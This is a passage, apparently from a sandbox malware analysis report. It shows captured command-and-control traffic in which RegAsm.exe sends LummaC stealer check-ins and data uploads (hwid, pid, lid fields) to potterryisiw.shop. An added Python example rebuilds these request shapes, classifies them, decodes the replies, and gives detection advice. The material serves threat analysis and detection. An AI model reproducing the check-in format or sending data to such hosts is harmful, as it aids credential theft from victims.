      Content-Length: 53
      Host: potterryisiw.shop
      2024-07-01 07:23:52 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d
      Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--default2806&j=
      2024-07-01 07:23:52 UTC | 810 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:52 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=p4k721qt8bl70757lnb4irhnd4; expires=Fri, 25-Oct-2024 01:10:31 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znQ%2BTPK5LxBTHKrMJemuETr6hjE1eABGelEkhgQzxC4HJR0FRP%2BSHI4eyj4Xk%2B4GJqKHkwbwesMotI4sBL1dGG59xLeioao25jCiuvWYaha%2FM2x3UnEM%2BZoI85UzXFZX%2FWVURg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a7343b994246-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:52 UTC559INData Raw: 63 65 34 0d 0a 56 74 41 44 56 2f 39 72 34 52 70 49 63 67 50 50 37 62 6b 4f 32 6d 34 75 58 4f 52 78 42 63 37 67 54 45 66 2b 73 35 76 38 4e 33 34 74 32 67 70 31 69 55 6e 62 4f 6e 78 65 43 63 62 50 79 6d 76 34 56 41 34 6f 6c 67 52 67 34 75 70 46 5a 5a 2f 58 75 63 59 58 47 44 65 38 63 44 4c 54 59 65 67 34 4c 51 6f 68 39 63 33 69 42 4e 4e 6e 56 58 7a 47 46 47 76 73 32 6d 78 6c 6d 39 6e 35 6e 56 73 63 4e 37 74 73 4a 35 4d 49 69 58 59 76 47 6d 61 73 69 64 68 69 74 77 74 4c 4f 59 55 62 61 36 65 4e 4a 43 72 63 6e 37 76 65 55 67 52 30 36 69 4e 31 73 67 36 56 65 77 55 54 63 4b 54 50 6d 58 50 32 5a 43 64 56 6e 31 45 6e 71 34 35 75 66 64 36 52 2b 70 6c 56 45 6a 43 30 61 44 2b 58 41 34 56 35 4c 42 68 7a 70 6f 76 52 5a 72 67 4b 52 7a 4f 4f 41 57 6d 6f 69 69 49 6b 6b 64
      Data Ascii: ce4VtADV/9r4RpIcgPP7bkO2m4uXORxBc7gTEf+s5v8N34t2gp1iUnbOnxeCcbPymv4VA4olgRg4upFZZ/XucYXGDe8cDLTYeg4LQoh9c3iBNNnVXzGFGvs2mxlm9n5nVscN7tsJ5MIiXYvGmasidhitwtLOYUba6eNJCrcn7veUgR06iN1sg6VewUTcKTPmXP2ZCdVn1Enq45ufd6R+plVEjC0aD+XA4V5LBhzpovRZrgKRzOOAWmoiiIkkd
      2024-07-01 07:23:52 UTC1369INData Raw: 78 73 38 43 45 78 6e 41 32 43 66 43 51 65 5a 61 47 4a 31 57 47 33 43 6b 59 2b 67 52 6c 76 70 49 4d 6a 4c 70 50 52 2f 4a 4e 52 47 6a 69 7a 5a 48 58 54 53 38 4e 2f 4d 6c 41 35 37 38 2f 31 61 37 73 65 44 67 75 46 48 57 6d 72 6c 47 35 6e 67 35 2b 52 39 54 34 46 64 76 4a 6d 4f 64 31 52 77 54 67 6b 46 57 36 2f 6a 73 6c 70 74 68 35 41 4f 34 41 65 5a 4b 4b 43 4b 79 4b 52 33 2f 2b 5a 56 68 51 77 73 32 38 35 6c 77 71 48 65 32 70 65 49 2b 32 49 77 79 7a 67 54 67 77 50 68 52 64 67 76 6f 45 67 5a 64 37 4f 74 2f 59 2b 64 79 33 77 49 54 4b 52 53 64 73 36 61 68 70 6e 6f 49 62 51 61 37 41 41 58 6a 57 4a 45 47 36 72 68 43 51 6d 6c 4e 76 2f 6b 46 51 62 4d 62 56 7a 4f 35 59 45 67 48 49 73 55 43 2f 76 7a 39 78 30 2b 46 51 4f 66 71 67 51 64 72 71 77 4c 54 53 4e 6b 62 75 42 47
      Data Ascii: xs8CExnA2CfCQeZaGJ1WG3CkY+gRlvpIMjLpPR/JNRGjizZHXTS8N/MlA578/1a7seDguFHWmrlG5ng5+R9T4FdvJmOd1RwTgkFW6/jslpth5AO4AeZKKCKyKR3/+ZVhQws285lwqHe2peI+2IwyzgTgwPhRdgvoEgZd7Ot/Y+dy3wITKRSds6ahpnoIbQa7AAXjWJEG6rhCQmlNv/kFQbMbVzO5YEgHIsUC/vz9x0+FQOfqgQdrqwLTSNkbuBG
      2024-07-01 07:23:52 UTC1369INData Raw: 55 4e 70 4d 48 68 47 35 71 55 6e 37 6a 35 37 41 48 6f 55 34 4d 4f 59 70 54 50 2b 37 43 49 69 79 63 32 76 4f 61 56 52 73 35 74 32 49 79 6e 67 53 45 63 69 51 58 5a 61 47 47 31 6d 71 34 43 30 67 37 6c 42 5a 75 6f 49 35 75 61 39 36 52 2f 6f 59 56 52 48 62 79 54 6a 4b 4c 43 71 78 37 4f 78 6b 68 37 35 43 56 42 4e 4e 6e 56 58 7a 47 46 47 76 73 32 6d 78 6c 6d 39 54 78 6c 56 4d 55 4e 4b 42 6b 4f 35 59 49 69 58 34 72 48 57 32 72 6a 39 70 73 76 67 42 4d 4f 59 45 42 64 61 6d 45 50 43 2f 63 6e 37 76 65 55 67 52 30 36 69 4e 31 71 78 6d 55 61 54 78 53 56 4b 36 42 31 57 75 75 54 41 34 68 79 48 73 4d 78 35 74 73 5a 5a 76 64 75 63 59 58 58 44 2b 79 62 54 4b 56 44 34 64 77 4a 52 39 6f 76 34 37 58 59 71 6f 4c 54 44 65 49 48 47 75 6c 6a 79 6b 6f 6c 39 76 30 6d 6c 49 64 64 50
      Data Ascii: UNpMHhG5qUn7j57AHoU4MOYpTP+7CIiyc2vOaVRs5t2IyngSEciQXZaGG1mq4C0g7lBZuoI5ua96R/oYVRHbyTjKLCqx7Oxkh75CVBNNnVXzGFGvs2mxlm9TxlVMUNKBkO5YIiX4rHW2rj9psvgBMOYEBdamEPC/cn7veUgR06iN1qxmUaTxSVK6B1WuuTA4hyHsMx5tsZZvducYXXD+ybTKVD4dwJR9ov47XYqoLTDeIHGuljykol9v0mlIddP
      2024-07-01 07:23:52 UTC | 10 | IN | Data Raw: 41 49 35 2b 49 68 64 76 0d 0a
      Data Ascii: AI5+Ihdv
      2024-07-01 07:23:52 UTC1369INData Raw: 34 33 66 63 0d 0a 6f 49 54 64 5a 37 38 4c 53 6a 4f 4f 48 6d 4b 76 67 79 6f 76 6a 74 4c 79 6c 46 67 57 64 50 77 6a 64 5a 6f 52 77 79 42 6f 55 45 61 68 70 73 74 33 71 68 6f 4d 66 4a 6c 64 44 38 66 70 4e 32 66 63 31 76 58 65 44 56 35 30 73 57 34 38 6b 67 47 4c 64 79 55 55 62 36 75 4a 31 6d 6d 33 42 6c 34 32 69 42 35 73 6f 34 6b 38 4a 5a 48 56 39 5a 70 64 46 7a 37 79 4c 33 66 64 44 70 73 34 63 6c 49 68 6d 49 4c 55 62 4c 73 61 44 48 79 5a 58 51 2f 48 36 54 64 6e 33 4e 62 31 33 67 31 65 64 4c 35 76 4e 5a 49 46 6a 33 4d 69 45 57 32 6a 69 4e 35 6c 73 41 52 65 50 34 49 62 5a 71 4b 4e 4c 79 47 5a 31 50 32 5a 55 52 6f 37 38 69 39 33 33 51 36 62 4f 48 4a 53 49 59 4b 6f 37 69 36 5a 4e 67 78 38 6d 56 30 50 78 2b 6b 33 5a 39 7a 57 39 64 34 4e 58 6e 53 2b 59 6a 6d 56 42
      Data Ascii: 43fcoITdZ78LSjOOHmKvgyovjtLylFgWdPwjdZoRwyBoUEahpst3qhoMfJldD8fpN2fc1vXeDV50sW48kgGLdyUUb6uJ1mm3Bl42iB5so4k8JZHV9ZpdFz7yL3fdDps4clIhmILUbLsaDHyZXQ/H6Tdn3Nb13g1edL5vNZIFj3MiEW2jiN5lsAReP4IbZqKNLyGZ1P2ZURo78i933Q6bOHJSIYKo7i6ZNgx8mV0Px+k3Z9zW9d4NXnS+YjmVB
      2024-07-01 07:23:52 UTC1369INData Raw: 58 5a 36 75 4f 32 47 6d 37 43 55 6f 2f 68 68 39 74 71 34 6f 6b 4b 35 48 58 2f 5a 68 54 58 48 72 77 49 54 4b 46 53 64 73 36 61 69 4a 73 6f 34 62 59 61 72 55 61 5a 41 2f 47 55 58 6a 69 36 6b 56 4f 68 5a 4f 35 6d 56 6c 63 62 50 41 68 4d 5a 59 42 6a 33 30 69 46 57 43 6c 68 64 4e 6a 74 78 35 4e 4d 59 38 55 62 4b 47 4e 49 43 43 53 77 2f 36 56 58 68 51 39 76 47 64 31 30 30 76 44 66 7a 4a 51 4f 65 2f 50 37 57 2b 32 42 31 30 78 68 52 38 6e 37 70 31 67 54 66 65 36 34 4e 77 56 47 7a 6a 79 4f 58 66 64 41 34 68 38 4b 52 52 6b 6f 6f 37 61 61 71 6f 4c 52 53 79 49 48 6d 69 6b 69 69 63 6b 6d 4e 54 30 6d 46 6b 57 4e 62 56 76 4f 35 56 4a 7a 54 70 71 46 33 6e 74 31 35 6b 73 6d 52 78 58 4c 4a 41 65 52 71 47 4e 62 6d 65 44 6e 35 48 31 50 67 56 32 38 6d 59 35 33 56 48 42 4f 43
      Data Ascii: XZ6uO2Gm7CUo/hh9tq4okK5HX/ZhTXHrwITKFSds6aiJso4bYarUaZA/GUXji6kVOhZO5mVlcbPAhMZYBj30iFWClhdNjtx5NMY8UbKGNICCSw/6VXhQ9vGd100vDfzJQOe/P7W+2B10xhR8n7p1gTfe64NwVGzjyOXfdA4h8KRRkoo7aaqoLRSyIHmikiickmNT0mFkWNbVvO5VJzTpqF3nt15ksmRxXLJAeRqGNbmeDn5H1PgV28mY53VHBOC
      2024-07-01 07:23:52 UTC1369INData Raw: 7a 5a 74 69 73 51 31 45 4d 49 6f 62 59 37 36 43 4a 53 79 54 30 50 61 65 56 68 30 2b 75 6e 4d 7a 6e 51 4b 4c 66 79 49 55 62 37 2b 4f 31 43 7a 32 54 67 77 35 6e 6c 4d 2f 37 73 49 66 4d 35 76 57 39 74 78 38 47 79 2b 7a 61 7a 61 57 42 63 4d 36 4e 56 34 4a 78 75 54 43 4c 76 67 4c 51 48 37 65 55 53 65 68 6a 69 4d 68 6a 74 33 35 6e 6c 77 62 50 71 42 75 4f 70 41 4b 67 33 30 34 45 58 4f 69 68 4e 35 76 76 41 4e 44 4d 6f 34 5a 4a 2b 4c 41 62 69 4b 45 6b 61 48 63 46 54 41 33 6f 32 74 33 75 68 4f 56 66 79 59 42 61 71 43 44 6d 79 36 6e 51 69 52 56 37 51 6f 6c 37 49 55 69 5a 63 53 54 75 5a 35 55 45 53 61 33 59 44 2b 58 42 49 74 33 4c 78 56 75 71 59 76 51 59 71 6f 43 51 7a 36 41 47 47 61 70 67 53 55 76 6b 74 6a 72 33 68 74 65 64 4c 56 35 64 63 56 4c 77 31 49 78 45 57 79
      Data Ascii: zZtisQ1EMIobY76CJSyT0PaeVh0+unMznQKLfyIUb7+O1Cz2Tgw5nlM/7sIfM5vW9tx8Gy+zazaWBcM6NV4JxuTCLvgLQH7eUSehjiMhjt35nlwbPqBuOpAKg304EXOihN5vvANDMo4ZJ+LAbiKEkaHcFTA3o2t3uhOVfyYBaqCDmy6nQiRV7Qol7IUiZcSTuZ5UESa3YD+XBIt3LxVuqYvQYqoCQz6AGGapgSUvktjr3htedLV5dcVLw1IxEWy
      2024-07-01 07:23:52 UTC1369INData Raw: 72 4d 45 54 7a 43 4f 47 6d 65 69 67 69 38 6f 6e 4a 47 33 33 42 55 62 4c 50 49 35 64 39 30 73 6f 47 38 38 47 69 4f 4f 6d 4d 31 6d 76 77 42 61 4e 59 63 51 63 61 47 53 62 6d 65 44 6e 35 48 31 50 67 56 32 38 6d 59 35 33 56 48 42 4f 43 45 66 62 36 43 45 33 32 57 39 42 45 38 37 67 78 6c 72 6f 49 4d 6d 4c 4a 62 55 2f 4a 68 66 48 7a 71 39 59 44 6d 5a 41 49 31 78 61 6c 34 6a 37 59 6a 44 4c 4f 42 4f 44 41 69 57 46 48 2b 68 6b 6d 77 58 6e 38 44 6f 69 31 67 4d 4d 76 42 4f 4e 70 45 4b 68 6e 38 36 55 43 4f 79 77 62 4d 48 30 78 55 4f 66 6f 45 66 4a 2f 54 41 62 69 57 59 33 66 71 5a 57 78 4d 35 76 57 59 2b 6b 67 4f 4e 61 69 55 56 61 61 47 48 31 6e 36 79 42 6c 34 33 6a 78 35 70 70 4a 41 74 5a 64 4b 54 75 5a 6c 4e 58 47 7a 77 49 51 65 58 43 6f 39 75 4a 78 38 68 37 35 43 56
      Data Ascii: rMETzCOGmeigi8onJG33BUbLPI5d90soG88GiOOmM1mvwBaNYcQcaGSbmeDn5H1PgV28mY53VHBOCEfb6CE32W9BE87gxlroIMmLJbU/JhfHzq9YDmZAI1xal4j7YjDLOBODAiWFH+hkmwXn8Doi1gMMvBONpEKhn86UCOywbMH0xUOfoEfJ/TAbiWY3fqZWxM5vWY+kgONaiUVaaGH1n6yBl43jx5ppJAtZdKTuZlNXGzwIQeXCo9uJx8h75CV
      2024-07-01 07:23:52 UTC1369INData Raw: 31 7a 70 78 35 73 6f 49 38 68 4c 74 79 66 6b 66 55 2b 64 33 53 30 49 57 33 66 57 63 30 51 51 58 73 4b 37 59 76 4b 4c 4f 42 4f 48 47 7a 64 52 6a 54 37 30 6e 78 4e 39 37 72 6d 30 44 31 33 58 36 73 4a 58 76 5a 69 77 32 35 71 53 43 50 2f 77 62 4d 48 30 32 63 4d 4c 4d 5a 4c 4a 65 7a 46 4c 54 65 4f 31 2f 71 49 56 6c 73 4b 6a 45 49 69 69 77 4f 59 4f 67 77 58 63 4b 53 5a 31 6e 36 47 4d 6d 49 7a 68 78 42 70 37 72 4d 34 4b 49 7a 53 2f 4a 6c 72 49 6a 71 31 64 54 4b 54 44 34 4d 34 5a 48 67 4b 78 75 53 62 59 2f 68 55 44 67 66 47 57 79 65 54 7a 45 5a 4f 39 37 71 35 68 68 56 45 64 76 4a 55 4e 70 4d 48 68 47 34 37 58 55 4b 36 6d 64 46 33 2b 69 70 4c 4c 34 38 46 61 72 37 43 59 45 33 33 75 70 4c 65 55 31 78 73 38 44 46 37 39 57 4c 6f 45 32 6f 55 63 4f 33 58 6d 54 7a 71 56
      Data Ascii: 1zpx5soI8hLtyfkfU+d3S0IW3fWc0QQXsK7YvKLOBOHGzdRjT70nxN97rm0D13X6sJXvZiw25qSCP/wbMH02cMLMZLJezFLTeO1/qIVlsKjEIiiwOYOgwXcKSZ1n6GMmIzhxBp7rM4KIzS/JlrIjq1dTKTD4M4ZHgKxuSbY/hUDgfGWyeTzEZO97q5hhVEdvJUNpMHhG47XUK6mdF3+ipLL48Far7CYE33upLeU1xs8DF79WLoE2oUcO3XmTzqV


      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      2 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:53 UTC | 283 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 12841
      Host: potterryisiw.shop
      2024-07-01 07:23:53 UTC12841OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:53 UTC | 802 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:53 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=dnm6vqpne4qs4fq6qkspn06d75; expires=Fri, 25-Oct-2024 01:10:32 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0D439jtixhrdYxGAmNeYGRnF1o6QGWlfZGLtYbN%2BAOTz1EcLvMIdI7PRc7ne8tkfe3C4MjvH9Z37ZaLVAFDQ8GfkfPXiw3FOjus1nbf%2FHAJd3doIxbdSxcmgHs1W74wiQj2hGg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a73a6a3f3300-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:53 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:54 UTC | 283 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 15083
      Host: potterryisiw.shop
      2024-07-01 07:23:54 UTC15083OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:54 UTC | 802 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:54 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=kn0726megd04ad2hpg8hvutmdp; expires=Fri, 25-Oct-2024 01:10:33 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2eKOvrRrAyznRiYvGvMiol%2FhwJj8XiNbsdnDkAxcOM32k8pqkmbbJkq7ONULFJWqpmkL3QR82WyPDJKMCysJMNy8jZqro%2B5sM7EgR2nlxBF8cak82rm7jDlilLfY2zB0Ps3aZA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a740ba544337-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:54 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


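The sessions above show the full LummaC check-in sequence from one process (RegAsm.exe, PID 6176) to potterryisiw.shop: an `act=life` heartbeat, an `act=recive_message` pull that returns a large base64-looking blob, then multipart uploads that carry `hwid`, `pid` and `lid` alongside binary data. The following is an added example, not code from the Joe Sandbox report or from the sample: it classifies raw requests of those three shapes, extracts the campaign (`lid`) and victim (`hwid`) identifiers, and reassembles the chunked reply bodies so that the `Data Ascii` cells above (`2ok`, `eok 8.46.123.33`) read as `ok` and `ok 8.46.123.33`. All sample bytes are constructed from the captured sessions; the page's upload capture is cut off after the `lid` field, so the trailing blob part (its field name `file` and its bytes) is a hypothetical stand-in.

```python
"""Recognise the LummaC C2 request shapes captured above and decode the replies.

Added example for this report, not code from Joe Sandbox or from the sample.
Every sample byte string below is constructed from the sessions on the page.
"""
import re
from urllib.parse import parse_qs

UA = (b"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
BOUNDARY = b"be85de5ipdocierre1"          # boundary the sample's uploads use


def http_request(ctype: bytes, body: bytes) -> bytes:
    """Rebuild a request with exactly the header set the sample sends."""
    return (b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: " + ctype
            + b"\r\nUser-Agent: " + UA + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\nHost: potterryisiw.shop\r\n\r\n" + body)


def form_part(name: bytes, value: bytes, filename: bytes = b"") -> bytes:
    """One multipart/form-data part, framed the way the capture shows it."""
    disp = b'form-data; name="' + name + b'"'
    if filename:
        disp += b'; filename="' + filename + b'"'
    return b"--" + BOUNDARY + b"\r\nContent-Disposition: " + disp + b"\r\n\r\n" + value + b"\r\n"


# Constructed samples. The capture is cut off after the lid field, so the
# "file" part (name and bytes) is a hypothetical stand-in; the rest is from the page.
LIFE_REQ = http_request(b"application/x-www-form-urlencoded", b"act=life")
RECV_REQ = http_request(b"application/x-www-form-urlencoded",
                        b"act=recive_message&ver=4.0&lid=H8NgCl--default2806&j=")
UPLOAD_REQ = http_request(
    b"multipart/form-data; boundary=" + BOUNDARY,
    form_part(b"hwid", b"C47BA87E7FEA4409D64FF88069D88493")
    + form_part(b"pid", b"2")
    + form_part(b"lid", b"H8NgCl--default2806")
    + form_part(b"file", bytes.fromhex("b55a3e93af351392cd36") + b"\x00" * 20, b"blob")
    + b"--" + BOUNDARY + b"--\r\n")
# Reply bodies exactly as captured (Transfer-Encoding: chunked)
LIFE_RESP_BODY = bytes.fromhex("32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a")
UPLOAD_RESP_BODY = bytes.fromhex("65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a 30 0d 0a 0d 0a")


def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Minimal multipart/form-data splitter: {field name: raw bytes}."""
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):                      # closing delimiter
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'[; ]name="([^"]*)"', head)      # '[; ]' keeps filename= from matching
        if m:
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def classify(raw: bytes) -> dict:
    """Map one captured request onto the C2 phase it belongs to (phase None = not C2)."""
    request_line, headers, body = split_request(raw)
    result = {"phase": None, "host": headers.get("host")}
    if not request_line.startswith("POST /api "):
        return result
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(body.decode("latin-1"), keep_blank_values=True).items()}
        if form.get("act") == "life":
            result["phase"] = "heartbeat"
        elif form.get("act") == "recive_message":         # sic: the misspelling is the malware's
            result.update(phase="config_pull", ver=form.get("ver"), lid=form.get("lid"))
    elif ctype.startswith("multipart/form-data"):
        m = re.search(r"boundary=([^;\s]+)", ctype)
        fields = parse_multipart(body, m.group(1).encode()) if m else {}
        meta = ("hwid", "pid", "lid")
        if all(k in fields for k in meta):
            result.update(phase="exfil", **{k: fields[k].decode() for k in meta},
                          blob_bytes=sum(len(v) for k, v in fields.items() if k not in meta))
    return result


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a chunked body: hex size CRLF data CRLF ... 0 CRLF CRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)     # drop any chunk extension
        if size == 0:
            return bytes(out)
        out += body[eol + 2:eol + 2 + size]
        pos = eol + 2 + size + 2                         # skip the data and its CRLF


if __name__ == "__main__":
    for req in (LIFE_REQ, RECV_REQ, UPLOAD_REQ):
        print(classify(req))
    print(decode_chunked(LIFE_RESP_BODY), decode_chunked(UPLOAD_RESP_BODY))
```

The `Data Ascii` cells keep the chunk framing inline, so `2ok` is a 2-byte chunk containing `ok`, `eok 8.46.123.33` is a 14-byte chunk, and the `recive_message` reply opens with a `ce4` (3300-byte) chunk and continues with a `43fc` (17404-byte) one; the base64-looking text inside is the encrypted configuration the report flags, not plaintext. The replies carry `Server: cloudflare` and `CF-RAY` headers and the resolver returned 188.114.96.3 and 188.114.97.3, which are the proxy's addresses rather than the operator's, so key detection on the `Host` header, the `POST /api` path and the `act=` / `hwid` / `pid` / `lid` fields rather than on the IP.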
      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      4 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:55 UTC | 283 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 20573
      Host: potterryisiw.shop
